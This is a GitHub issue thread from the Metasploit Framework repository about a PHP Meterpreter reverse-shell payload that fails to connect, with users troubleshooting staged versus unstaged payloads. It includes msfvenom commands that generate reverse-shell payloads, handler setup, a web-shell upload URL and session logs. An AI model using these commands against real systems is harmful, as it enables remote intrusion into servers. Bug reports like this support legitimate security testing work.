search

rapid7 / metasploit-framework

Metasploit Framework
https://www.metasploit.com/
Other
34.27k stars 14k forks source link

PHP Reverse Shell is not working #8964

Closed ghost closed 6 years ago

ghost commented 7 years ago

shell5.TXT

Steps to reproduce

How'd you do it?

  1. First, creating the backdoor with msfvenom outside of metasploit

    root@5433584:~# msfvenom -p php/meterpreter_reverse_tcp LHOST=10.14.11.92 LPORT=4449 -f raw > shell5.PHP
No platform was selected, choosing Msf::Module::Platform::PHP from the payload
No Arch selected, selecting Arch: php from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 30067 bytes

  2. Starting the listener

    
msf > use multi/handler
msf exploit(handler) > set payload php/meterpreter/reverse_tcp
payload => php/meterpreter/reverse_tcp
msf exploit(handler) > set lhost 10.14.11.92
lhost => 10.14.11.92
msf exploit(handler) > set lport 4449
lport => 4449
msf exploit(handler) > show options

Module options (exploit/multi/handler):

Name Current Setting Required Description

Payload options (php/meterpreter/reverse_tcp):

Name Current Setting Required Description

LHOST 10.14.11.92 yes The listen address LPORT 4449 yes The listen port

Exploit target:

Id Name

0 Wildcard Target

msf exploit(handler) > exploit [*] Exploit running as background job 0.

[*] Started reverse TCP handler on 10.14.11.92:4449

netstat -an |grep 444 shows:

root@5433584:~# netstat -an |grep 444 tcp 0 0 10.14.11.92:4449 0.0.0.0:* LISTEN


Therefore, everythings is fine. 

Calling the PHP script directly in Browser to trigger:
http://10.14.11.150/admin/uploads/shell5.PHP

This section should also tell us any relevant information about the
environment; for example, if an exploit that used to work is failing,
tell us the victim operating system and service versions.

## Expected behavior

Shell should come up

## Current behavior
Error message comes up 
Parse error: syntax error, unexpected '[' in /var/www/admin/uploads/shell5.PHP on line 1 

I've looked at the source of the shell and saw this:
/*<?php /**/ if (!isset($GLOBALS['channels'])) { $GLOBALS['channels'] = array(); } if (!isset($GLOBALS['channel_process_map'])) { $GLOBALS['channel_process_map'] = array(); } if (!isset($GLOBALS['resource_type_map'])) { $GLOBALS['resource_type_map'] = array(); } if (!isset($GLOBALS['udp_host_map'])) { $GLOBALS['udp_host_map'] = array(); } if (!isset($GLOBALS[

Question:
this should be without the /* comment, right?
Even when removing it, behavior is the same. the <?php seems not to be closed anywhere.

Source is attached as txt-file. 

## System stuff

### Metasploit version
Framework: 4.16.6-dev
Console  : 4.16.6-dev

### I installed Metasploit with:
- [X ] Kali package via apt
- [ ] Omnibus installer (nightly)
- [ ] Commercial/Community installer (from http://www.rapid7.com/products/metasploit/download.jsp)
- [ ] Source install (please specify ruby version)

### OS
Linux 54784584 4.12.0-kali1-amd64 #1 SMP Debian 4.12.6-1kali1 (2017-08-18) x86_64 GNU/Linux

thanks fo rchecking
AlistairXX commented 7 years ago

Nicely explained

jvoisin commented 7 years ago

The comment shouldn't matter, and there is no need to close the opening <?php, the issue is elsewhere :/

Rogdham commented 7 years ago

Hello @DontFuckItUp, I believe the issue is because you used the payload php/meterpreter_reverse_tcp with msfvenom (unstaged payload), but specified the staged version php/meterpreter/reverse_tcp in msfconsole.

Notice that one has a _ between meterpreter and reverse while the other has a /

Could you try and use the same version in both msfvenom and msfconsole (e.g. php/meterpreter/reverse_tcp in both cases)?

ghost commented 7 years ago

Hello, i tested your recommendation with no luck. to be more detailed: i followed your directions: Could you try and use the same version in both msfvenom and msfconsole (e.g. php/meterpreter/reverse_tcp in both cases)?

and as the result, the session dies my full log:

root@klappse:~# msfvenom -p php/meterpreter/reverse_tcp LHOST=10.14.11.92 LPORT=4449 -f raw > shell6.PHP
No platform was selected, choosing Msf::Module::Platform::PHP from the payload
No Arch selected, selecting Arch: php from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 1112 bytes

root@klappse:~# msfconsole

  Metasploit Park, System Security Interface
  Version 4.0.5, Alpha E
  Ready...
  > access security
  access: PERMISSION DENIED.
  > access security grid
  access: PERMISSION DENIED.
  > access main security grid
  access: PERMISSION DENIED....and...
  YOU DIDN'T SAY THE MAGIC WORD!
  YOU DIDN'T SAY THE MAGIC WORD!
  YOU DIDN'T SAY THE MAGIC WORD!
  YOU DIDN'T SAY THE MAGIC WORD!
  YOU DIDN'T SAY THE MAGIC WORD!
  YOU DIDN'T SAY THE MAGIC WORD!
  YOU DIDN'T SAY THE MAGIC WORD!

       =[ metasploit v4.16.9-dev                          ]
+ -- --=[ 1687 exploits - 966 auxiliary - 299 post        ]
+ -- --=[ 498 payloads - 40 encoders - 10 nops            ]
+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]

msf > use multi/handler
msf exploit(handler) > set payload php/meterpreter/reverse_tcp
payload => php/meterpreter/reverse_tcp
msf exploit(handler) > show options

Module options (exploit/multi/handler):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------

Payload options (php/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST                   yes       The listen address
   LPORT  4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target

msf exploit(handler) > set LHOST 10.14.11.92
LHOST => 10.14.11.92
msf exploit(handler) > set LPORT 4449
LPORT => 4449
msf exploit(handler) > show options

Module options (exploit/multi/handler):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------

Payload options (php/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  10.14.11.92      yes       The listen address
   LPORT  4449             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target

msf exploit(handler) > exploit
[*] Exploit running as background job 0.

[*] Started reverse TCP handler on 10.14.11.92:4449
msf exploit(handler) > [*] Sending stage (37514 bytes) to 10.14.11.91
[*] Meterpreter session 1 opened (10.14.11.92:4449 -> 10.14.11.91:45139) at 2017-10-09 12:44:22 +0200
[*] 10.14.11.91 - Meterpreter session 1 closed.  Reason: Died
kawaxi commented 7 years ago

I might be having a similar issue if not the same one!

gaskinsus commented 6 years ago

I'm seeing similar in v4.16.13-dev. Tcpdump shows syn packets on attacker machine with no response. Is in ctf environment so cannot get files.

fsacer commented 6 years ago

@wvu-r7 seems there wasn't a stable connectiuon/something blocking it so it's probably not a valid bug.

Gilpw commented 6 years ago

wrong payload (php/meterpreter/reverse_tcp), set (php/meterpreter_reverse_tcp)

jopeywhiskerz commented 1 year ago

Remove the comment at the beginning and add a ?> at the end